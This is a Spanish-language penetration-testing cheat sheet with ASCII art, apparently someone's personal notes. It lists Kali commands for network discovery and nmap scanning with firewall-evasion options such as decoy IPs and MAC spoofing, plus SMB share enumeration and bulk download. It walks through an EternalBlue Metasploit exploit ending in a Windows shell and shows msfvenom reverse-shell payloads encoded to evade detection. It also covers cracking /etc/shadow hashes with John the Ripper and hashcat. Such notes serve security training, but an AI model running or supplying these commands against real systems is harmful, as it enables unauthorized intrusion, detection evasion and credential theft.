FOR LEGAL PURPOSES ONLY:


      
      
                       ."-,.__
                       `.     `.  ,
                    .--'  .._,'"-' `.
                   .    .'         `'
                   `.   /          ,'
                     `  '--.   ,-"'
                      `"`   |  \
                         -. \, |
                          `--Y.'      ___.
                               \     L._, \
                     _.,        `.   <  <\                _
                   ,' '           `, `.   | \            ( `
                ../, `.            `  |    .\`.           \ \_
               ,' ,..  .           _.,'    ||\l            )  '".
              , ,'   \           ,'.-.`-._,'  |           .  _._`.
            ,' /      \ \        `' ' `--/   | \          / /   ..\
          .'  /        \ .         |\__ - _ ,'` `        / /     `.`.
          |  '          ..         `-...-"  |  `-'      / /        . `.
          | /           |L__           |    |          / /          `. `.
         , /            .   .          |    |         / /             ` `
        / /          ,. ,`._ `-_       |    |  _   ,-' /               ` \
       / .           \"`_/. `-_ \_,.  ,'    +-' `-'  _,        ..,-.    \`.
      .  '         .-f    ,'   `    '.       \__.---'     _   .'   '     \ \
      ' /          `.'    l     .' /          \..      ,_|/   `.  ,'`     L`
      |'      _.-""` `.    \ _,'  `            \ `.___`.'"`-.  , |   |    | \
      ||    ,'      `. `.   '       _,...._        `  |    `/ '  |   '     .|
      ||  ,'          `. ;.,.---' ,'       `.   `.. `-'  .-' /_ .'    ;_   ||
      || '              V      / /           `   | `   ,'   ,' '.    !  `. ||
      ||/            _,-------7 '              . |  `-'    l         /    `||
      . |          ,' .-   ,' ||               | .-.        `.      .'     ||
       `'        ,'    `".'    |               |    `.        '. -.'       `'
                /      ,'      |               |,'    \-.._,.'/'
                .     /        .               .       \    .''
              .`.    |         `.             /         :_,'.'
                \ `...\   _     ,'-.        .'         /_.-'
                 `-.__ `,  `'   .  _.>----''.  _  __  /
                      .'        /"'          |  "'   '_
                     /_|.-'\ ,".             '.'`__'-( \
                       / ,"'"\,'               `/  `-.|"


=========================================================================================
	                  .___      ____              __    ________  
	                __| _/____ /_   | ________ __|  | __\_____  \ 
	               / __ |\__  \ |   |/  ___/  |  \  |/ /  _(__  < 
	              / /_/ | / __ \|   |\___ \|  |  /    <  /       \
	              \____ |(____  /___/____  >____/|__|_ \/______  /
	                   \/     \/         \/           \/       \/ 

=========================================================================================






KALI TOOLS
_________________________________________________________________________________________

# Actualizar e instalar todas la herramientas de Kali Linux
	sudo apt update && sudo apt upgrade -y
	sudo apt update && sudo apt install kali-tools-*



====================
===     ENUM     ===
====================



DESCUBRIMIENTO DE HOSTS
_________________________________________________________________________________________

# Enumera los host
	sudo arp-scan [rango IP/MS] -g
	sudo arp-scan -I [interfaz] [rango IP/MS] -g
	sudo netdiscover -r [rango IP/MS]
	sudo nbtscan -r [rango IP/MS]
	masscan   ---   https://www.kali.org/tools/masscan/


NMAP
_________________________________________________________________________________________

# Enumera los puertos abiertos
	sudo nmap -vv -sC -sV -p- [RHOST]
	sudo nmap -sV -sU [RHOST]   ---   escaneo UDP
	sudo nmap -T4 -sC -sV --script vuln [RHOST]   ---   busca vuln
	sudo nmap -vv [rango IP/MS]
	sudo nmap -sC -sV -p- --scan-delay 5s [RHOST]

# nmap firewall
	sudo nmap -vv -sV --mtu 16 --source-port 443 --spoof-mac 81:49:fd:8a:46:51 [RHOST]
	sudo nmap -vv -sV -f -sS -D 8.8.8.8,20.20.20.20,192.168.54.20,24.132.225.31 [RHOST]

https://nmap.org/man/es/index.html


SMB 445
_________________________________________________________________________________________

# Mostrar, controlar o manipular recursos compartidos
	smbclient -L [RHOST] -N
# Conectarse, listar y descargar recursos
	smbclient //[RHOST]/[RECURSO] -N
	dir
	prompt off
	mget *
	get [RECURSO]

https://www.samba.org/samba/docs/4.9/man-html/smbclient.1.html

	enum4linux -a [RHOST]
	nmap -p445 --script smb* [RHOST]
	smbmap -H [IP]
	smbmap -H [IP] -u [user] -p [password]   ---   probar usuario y una única contraseña para ver recursos compartidos


RDP 3389
_________________________________________________________________________________________

	nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 [RHOST]   ---   lanza 3 scripts importantes para la vuln del 3389 
	xfreerdp /u:[USER] /p:[PASS] /v:[IP] /cert-ignore   ---   conectarse por RDP a un equipo


AUTORECON TOOL
_________________________________________________________________________________________

# Lanza un conjunto grande de herramientas para enumeracion (no incluye evasion de firewall)
	sudo apt install autorecon
	sudo autorecon [RHOST]



====================
===     EXPL     ===
====================



METASPLOIT
_________________________________________________________________________________________

# Actualizar
	sudo apt install metasploit-framework
# Arranque
	msfconsole
# Mostrar categorias
	show [categoria]
# Buscar exploit, payload...
	search [name exploit]
# Usar la herramienta
	use [nombre o nº lista]
	show payloads   ---   muestra PL para ese exploit, siempre coger reverse
	show info   ---   muestra la informacion
# Ver requerimientos de la herramienta
	show options			
# Rellenar campos necesarios
	set [nombre campo] [dato]
# Lanzar herramienta
	run
# ex:
	search ms17-010
	use exploit/windows/smb/ms17_010_eternalblue
	options
	set RHOSTS 10.10.22.199
	set LHOST 10.0.1.20
	run
	meterpreter > help
	meterpreter > shell
	C:\Windows\system32>


SIN METASPLOIT
_________________________________________________________________________________________

# Buscar exploits:
https://www.exploit-db.com/
https://sploitus.com/

# Busqueda exploits en Kali. Es espejo de exploit-db.com.
	sudo apt update && apt -y install exploitdb
	searchsploit MS17-010
	searchsploit -m 422315
https://acortar.link/searchsploit

# GitHub > code > copiar reco
	git clone https://github.com/d4t4s3c/Win7Blue.git
	# Seguir indicaciones, en este caso especifico:
	chmod +x Win7Blue   ---   Permiso de ejecucion
	./Win7Blue




====================
===     ENCD     ===
====================



# Payload sin endoder:
	msfvenom -p windows/meterpreter/reverse_tcp RHOST=[RHOST] LHOST=[LHOST] LPORT=[4444] -f exe > reverse.exe
# Payload con endoder:
	msfvenom -p windows/meterpreter/reverse_tcp RHOST=[RHOST] LHOST=[LHOST] LPORT=[4444] -e x86/shikata-ga-nai -i 250 -f exe > encoded.exe



====================
===     CRCK     ===
====================

# Repositorios de diccionarios
https://github.com/danielmiessler/SecLists
https://github.com/hackingyseguridad/diccionarios/tree/master

# Kali
	/usr/share/wordlists/   ---   ubicacion de dicc
	cat myrockyou.txt | grep [CAMPO]   ---   saber si esta en la lista


HASH
_________________________________________________________________________________________

# Hash identifier / verifier WEB
https://hashes.com/en/decrypt/hash

# Hash identifier Kali
	hash-identifier
	HAST: [HAST]
# Hash verifier Kali
	hashcat -m [NºHAST] [HAST] /usr/share/wordlists/rockyou.txt


CIFRADO
_________________________________________________________________________________________

# JohnTheRipper, ver cifrados que admite. 
	john --list=formats
	john --list=formats | grep md5
	john --list=formats | grep MD5
	sudo john --format=[FORMAT] --wordlist=[path to wordlist] [path to file]
	sudo john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt /Downloads/hast.txt

# Crack teniendo acceso a /etc/passwd y /etc/shadow
	unshadow passwd.txt shadow.txt > unshadow.txt
# Suele ser comun el formato de sha512. Se ra comun usar el --format=sha512crypt
	john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadow.txt









ALIAS
_________________________________________________________________________________________

# Crear alias para agilizar trabajo
	echo "$SHELL"
		/bin/bash	nano ~/.bashrc
		/bin/zsh	nano ~/.zshrc
		/bin/fish	nano ~/.config/fish/config.fish
	sudo nano ~/.zshrc
# Introduces alias
	alias upy="sudo apt update && sudo apt upgrade -y"
	Ctrl+O (guarda) y enter
	Ctrl+X (cierra)
		/bin/bash	source ~/.bashrc
		/bin/zsh	source ~/.zshrc
		/bin/fish	source ~/.config/fish/config.fish





HELP STAT
_________________________________________________________________________________________

# arp-scan # Enumera los host que hay en la red. 
-I		[interfaz] para indicar el interfaz si fuese necesario
-g		ignora los duplicados
_________________________________________________________________________________________

# nmap # Enumera los puertos abiertos, solo los 1000 mas comunes.
-vv		lista mientras se ejecuta
-sV		detecta servicios y versiones 
-p-		comprueba todos los puertos
-p[puerto]	escanea el puerto indicado
-sC		lanza scripts
-Pn		no hace el ping
--script	elegir un script para utilizar.
	locate .nse | xargs grep "categories" | grep -oP '".*?"' | sort -u   ---   muestra las categorias
		ex: nmap -p[PUERTO] [IP] --script="categoria"
	listar scripts:
		ls -lh /usr/share/nmap/scripts/
		ls -lh /usr/share/nmap/scripts/*ssh*
	ex: nmap -vv -sV -p445 --script smb-vuln-cve2009-3103.nse [RHOST]   ---   usa ese script
	ex: nmap -vv -sV -p445 --script vuln [RHOST]   ---   usa todos los scripts con "vuln"
	ex: nmap -vv -sV -p445 --script smb-vuln-* [RHOST]   ---   usa solo los que empiezen por "smb-vuln-"
-oN[name]	guarda los resultados en txt
-T0 a -T5	velocidad del scaneo T3 es la velocidad estandar (-T5 solo entorno controlado)
-A		intenta detectar versiones y SO (solo entorno controlado)


# nmap firewall
--mtu 8 y 16	reduce el tamaño de los paquetes
-f		reduce el tamaño de los paquetes al minimo
--source-port	configura el puerto de origen, imitando la petición desde otro puerto
-D		falsea IPs, enviando paquetes falsos a la red (tu IP va incluida)
--spoof-mac	falsifica la direccion MAC de origen
-sS		realiza escaneo SYN sin establecer una conexion completa
--max-rate	controla la velocidad
_________________________________________________________________________________________

# smbclient # Enumera,modifica,controla los recursos compartidos
-L		lista los recursos compartidos
-N		no pide la contraseña
_________________________________________________________________________________________

# smbclient operations #
dir		lista recursos
prompt off	no pregunta con mget y mput la confirmacion de tranferencia
mget *		copia todos los recursos de la carpeta
get		copia el recurso seleccionado
